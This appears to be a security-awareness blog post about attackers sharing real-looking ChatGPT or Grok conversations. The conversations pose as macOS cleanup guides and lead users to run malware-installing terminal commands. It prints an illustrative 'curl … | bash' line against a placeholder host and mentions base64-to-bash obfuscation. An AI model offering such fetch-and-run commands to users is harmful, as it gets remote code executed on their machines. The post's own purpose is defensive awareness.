
Nicolás

When a seemingly inoffensive conversation with AI turns malicious

AI has changed the way we interact with technology in many ways, from simple tasks such as generating text and helping with homework to more technical ones like creating web pages and assisting developers with code reviews.

One of the most significant changes has been the way we search for information. It is now common to default to an LLM such as ChatGPT, Gemini, Grok, or Claude to ask about almost anything we can think of: planning trips, searching for historical facts, explaining complex documentation, or helping us fix problems by providing step-by-step guides.

It is in this last area where cybercriminals have found a way to exploit the trust users place in these platforms, creating an attack vector that tricks users into downloading and installing malware designed to steal credentials, as reported earlier this month by the cybersecurity company Huntress.

What category does this attack fit into?

Social engineering through the “impersonation” of a legitimate LLM conversation.

How does it work?

I will leave out the technical details for the sake of simplicity and refer you to the original article. In a nutshell, the attack abuses the shareable conversation feature available in Grok and OpenAI's ChatGPT.

This feature allows users to generate a unique URL that can be easily shared on social media, instant messaging platforms, or public forums, and anyone with the link can access the conversation.

These conversations can be indexed by search engines and may rank highly, so a link to what looks like a legitimate conversation can end up near the top of the results page.

Why does it work?

The conversations resemble step-by-step guides on how to perform common operations on macOS devices, such as clearing storage.

Users access the link through a browser and see a real conversation with an LLM—real in the sense that it is the actual UI and platform used when interacting with Grok or ChatGPT.

This creates an element of trust, as users are familiar with these platforms. However, without realizing it, the steps include malicious terminal commands that open the user’s computer to attackers.
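
To make the pattern easier to recognize, here is a hypothetical sketch of the general shape such a step can take. The domain and script name are placeholders invented for illustration, not the actual infrastructure described in the Huntress report:

    # Presented as a harmless "cleanup" step, but this single line downloads
    # and executes a remote, attacker-controlled script (placeholder URL).
    curl -s https://example.com/cleanup.sh | bash

    # Obfuscated variants are common too, e.g. an encoded blob piped through
    # "base64 -d | bash", which reads as gibberish at a casual glance.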

How to protect yourself

AI is not flawless. We all know that LLMs can hallucinate and provide made-up information in an attempt to be helpful. In that sense, this scenario is not entirely different. If an LLM asked for your Social Security number or your bank password, or guided you through making a bank transfer to an account you don't recognize, you would not comply, right?

Here, instead of asking for sensitive information directly, the model instructs users to run commands in their device’s terminal without clearly explaining what those commands do, and those commands can be highly destructive.

The recommended precautions

  1. Never provide sensitive information.
  2. Never execute terminal commands unless you fully understand what they do, even if they appear to come from a trusted source (see the example after this list).
  3. Follow good password hygiene to keep your accounts secure, such as never reusing passwords and using a password manager to generate strong, unique credentials.
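
For point 2, a concrete habit helps: if a guide tells you to pipe a download straight into your shell, save the script to a file and read it before deciding whether to run it. The URL and file name below are placeholders, not a real fix:

    # Instead of blindly running:  curl -s https://example.com/fix.sh | bash
    # download the script first, read it, and only then decide.
    curl -s -o fix.sh https://example.com/fix.sh
    less fix.sh    # inspect what the script actually does before executing anything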
